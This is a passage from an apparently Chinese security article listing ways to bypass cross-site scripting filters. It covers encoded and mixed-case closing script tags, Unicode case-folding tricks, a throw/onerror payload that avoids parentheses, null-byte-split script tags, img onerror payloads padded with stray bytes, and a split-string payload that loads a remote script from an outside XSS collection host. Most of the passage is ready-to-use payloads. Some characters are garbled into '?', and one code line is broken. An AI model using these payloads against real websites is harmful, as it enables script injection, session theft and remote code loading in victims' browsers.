style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">05</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"></span><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">过滤 /script <br/></span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"><br/></span></p></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="perl"><code><span class="code-snippet_outer"><%2fscript></span></code><code><span class="code-snippet_outer"><%252fscript></span></code><code><span class="code-snippet_outer"><%252fScRipt></span></code><code><span class="code-snippet_outer"><%252fScrIPt%20></span></code><code><span class="code-snippet_outer"><%252fsCrIpt+ipT%20></span></code></pre></section><section class="" style="padding-right: 10px;padding-left: 10px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">06</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">利用javascript 大小写绕过限制</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span class="md-plain md-expand" style="box-sizing: border-box;"><br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> (!<span class="code-snippet__built_in">String</span>.fromCodePoint) {</span></code><code><span class="code-snippet_outer">(<span class="code-snippet__function"><span class="code-snippet__keyword">function</span>(<span class="code-snippet__params"></span>) </span>{</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> defineProperty = (<span class="code-snippet__function"><span class="code-snippet__keyword">function</span>(<span class="code-snippet__params"></span>) </span>{</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__comment">// IE 8 only supports `Object.defineProperty` on DOM elements</span></span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">try</span> {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> object = {};</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> $defineProperty = <span class="code-snippet__built_in">Object</span>.defineProperty;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> result = $defineProperty(object, object, object) && $defineProperty;</span></code><code><span class="code-snippet_outer"> } <span class="code-snippet__keyword">catch</span>(error) {}</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">return</span> result;</span></code><code><span class="code-snippet_outer"> }());</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> stringFromCharCode = <span class="code-snippet__built_in">String</span>.fromCharCode;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> floor = <span class="code-snippet__built_in">Math</span>.floor;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> fromCodePoint = <span class="code-snippet__function"><span class="code-snippet__keyword">function</span>(<span class="code-snippet__params"></span>) </span>{</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> MAX_SIZE = <span class="code-snippet__number">0x4000</span>;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> codeUnits = [];</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> highSurrogate;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> lowSurrogate;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> index = <span class="code-snippet__number">-1</span>;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> length = <span class="code-snippet__built_in">arguments</span>.length;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">if</span> (!length) {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">return</span> <span class="code-snippet__string">''</span>;</span></code><code><span class="code-snippet_outer"> }</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> result = <span class="code-snippet__string">''</span>;</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">while</span> (++index < length) {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> codePoint = <span class="code-snippet__built_in">Number</span>(<span class="code-snippet__built_in">arguments</span>);</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">if</span> (</span></code><code><span class="code-snippet_outer"> !<span class="code-snippet__built_in">isFinite</span>(codePoint) || <span class="code-snippet__comment">// `NaN`, `+Infinity`, or `-Infinity`</span></span></code><code><span class="code-snippet_outer"> codePoint < <span class="code-snippet__number">0</span> || <span class="code-snippet__comment">// not a valid Unicode code point</span></span></code><code><span class="code-snippet_outer"> codePoint > <span class="code-snippet__number">0x10FFFF</span> || <span class="code-snippet__comment">// not a valid Unicode code point</span></span></code><code><span class="code-snippet_outer"> floor(codePoint) != codePoint <span class="code-snippet__comment">// not an integer</span></span></code><code><span class="code-snippet_outer"> ) {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">throw</span> <span class="code-snippet__built_in">RangeError</span>(<span class="code-snippet__string">'Invalid code point: '</span> + codePoint);</span></code><code><span class="code-snippet_outer"> }</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">if</span> (codePoint <= <span class="code-snippet__number">0xFFFF</span>) { <span class="code-snippet__comment">// BMP code point</span></span></code><code><span class="code-snippet_outer"> codeUnits.push(codePoint);</span></code><code><span class="code-snippet_outer"> } <span class="code-snippet__keyword">else</span> { <span class="code-snippet__comment">// Astral code point; split in surrogate halves</span></span></code><code><span class="code-snippet_outer"> <span class="code-snippet__comment">// http://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae</span></span></code><code><span class="code-snippet_outer"> codePoint -= <span class="code-snippet__number">0x10000</span>;</span></code><code><span class="code-snippet_outer"> highSurrogate = (codePoint >> <span class="code-snippet__number">10</span>) + <span class="code-snippet__number">0xD800</span>;</span></code><code><span class="code-snippet_outer"> lowSurrogate = (codePoint % <span class="code-snippet__number">0x400</span>) + <span class="code-snippet__number">0xDC00</span>;</span></code><code><span class="code-snippet_outer"> codeUnits.push(highSurrogate, lowSurrogate);</span></code><code><span class="code-snippet_outer"> }</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">if</span> (index + <span class="code-snippet__number">1</span> == length || codeUnits.length > MAX_SIZE) {</span></code><code><span class="code-snippet_outer"> result += stringFromCharCode.apply(<span class="code-snippet__literal">null</span>, codeUnits);</span></code><code><span class="code-snippet_outer"> codeUnits.length = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer"> }</span></code><code><span class="code-snippet_outer"> }</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">return</span> result;</span></code><code><span class="code-snippet_outer"> };</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">if</span> (defineProperty) {</span></code><code><span class="code-snippet_outer"> defineProperty(<span class="code-snippet__built_in">String</span>, <span class="code-snippet__string">'fromCodePoint'</span>, {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__string">'value'</span>: fromCodePoint,</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__string">'configurable'</span>: <span class="code-snippet__literal">true</span>,</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__string">'writable'</span>: <span class="code-snippet__literal">true</span></span></code><code><span class="code-snippet_outer"> });</span></code><code><span class="code-snippet_outer"> } <span class="code-snippet__keyword">else</span> {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__built_in">String</span>.fromCodePoint = fromCodePoint;</span></code><code><span class="code-snippet_outer"> }</span></code><code><span class="code-snippet_outer">}());</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">var</span> j = <span class="code-snippet__string">'A'</span>.charCodeAt(); j <= <span class="code-snippet__string">'Z'</span>.charCodeAt(); j++){</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">var</span> s = <span class="code-snippet__built_in">String</span>.fromCodePoint(j);</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">var</span> i = <span class="code-snippet__number">0</span>; i < <span class="code-snippet__number">0x10FFFF</span>; i++) {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">var</span> e = <span class="code-snippet__built_in">String</span>.fromCodePoint(i);</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">if</span> (s == e.toUpperCase() && s != e) {</span></code><code><span class="code-snippet_outer"> <span class="code-snippet__built_in">document</span>.write(<span class="code-snippet__string">"char: "</span>+e+<span class="code-snippet__string">"<br/>"</span>);</span></code><code><span class="code-snippet_outer">};</span></code><code><span class="code-snippet_outer">};</span></code><code><span class="code-snippet_outer">}</span></code></pre></section>运行后:<br/></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: a</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: b</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: c</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: d</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: e</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: f</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: g</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: h</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: i</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: ?</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: j</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: k</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: l</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: m</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: n</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: o</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: p</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: q</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: r</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: s</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: ?</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: t</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: u</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: v</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: w</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: x</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: y</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">char</span>: z</span></code></pre></section><section class="" style="padding-right: 10px;padding-left: 10px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">其中混入了两个奇特的字符"?"、"?"。这两个字符的“大写”是I和S。也就是说"?".toUpperCase() == 'I',"?".toUpperCase() == 'S'。通过这个小特性可以绕过一些限制。</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br/></p></section><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">07</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"></span><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">过滤括号</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span class="md-plain md-expand" style="box-sizing: border-box;"><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">当括号被过滤的时候可以使用throw来绕过</span>。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">a</span> <span class="code-snippet__attr">onmouseover</span>=<span class="code-snippet__string">"javascript:window.onerror=alert;throw 1></span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer"><img src=x onerror="</span><span class="code-snippet__attr">javascript:window.onerror</span>=<span class="code-snippet__string">alert;throw</span> <span class="code-snippet__attr">1</span>"></span></code></pre></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">08</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">利用0字节绕过<br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="apache"><code><span class="code-snippet_outer"><span class="code-snippet__section"><scri%00pt></span><span class="code-snippet__attribute">alert</span>(1);</scri<span class="code-snippet__number">%00</span>pt></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section"><scrix00pt></span><span class="code-snippet__attribute">alert</span>(1);</scri<span class="code-snippet__number">%00</span>pt></span></code><code><span class="code-snippet_outer"><span class="code-snippet__section"><s%00c%00r%00%00ip%00t></span><span class="code-snippet__attribute">confirm</span>(0);</s<span class="code-snippet__number">%00</span>c<span class="code-snippet__number">%00</span>r<span class="code-snippet__number">%00</span><span class="code-snippet__number">%00</span>ip<span class="code-snippet__number">%00</span>t></span></code></pre></section></section></section></section><p><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">09</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">利用ascii编码绕过</span></p><p><br/></p><h5 class="md-end-block md-heading md-focus" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 2;font-size: 1em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.4;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size:16px;line-height:36px;;">利用其它ascii码绕过,正则表达式中w是无法匹配到的</span></h5><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">img</span>/ /μ <span class="code-snippet__attr">src</span>=<span class="code-snippet__string">x</span> <span class="code-snippet__attr">onerror</span>=<span class="code-snippet__string">alert(1)//</span>></span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">img</span> <span class="code-snippet__attr">src</span>=<span class="code-snippet__string">x17x17</span> <span class="code-snippet__attr">onerror</span>=<span class="code-snippet__string">alert(1)//</span>></span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">img</span>/\%<span class="code-snippet__attr">20src</span>=<span class="code-snippet__string">%17y%17</span> <span class="code-snippet__attr">onerror</span>=<span class="code-snippet__string">%C2%A0alert(1)//</span>></span></span></code></pre></section><p><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">10<br/></span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">先拆分再组合<br/></span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"><br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">script</span>></span><span class="xml">var a=’h';var b=’://’;document.write(‘<span class="code-snippet__tag"><<span class="code-snippet__name">script</span> <span class="code-snippet__attr">src</span>=<span class="code-snippet__string">”‘+a+’ttp’+b+’xss.tw/xxx”</span>></span><span class="xml"><span class="code-snippet__tag"><<span class="code-snippet__name"></span>/<span class="code-snippet__attr">script</span>></span>’);</span></span><span class="code-snippet__tag"></<span class="code-snippet__name">script</span>></span></span></code></pre></section><p><br/></p><p><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">11<br/></span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">过滤括号和分号</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span class="md-plain md-expand" style="box-sizing: border-box;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;">第一种方法非常简单:你可以使用花括号来进行语句隔离,将</span><span spellcheck="false" style="box-sizing: border-box;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, 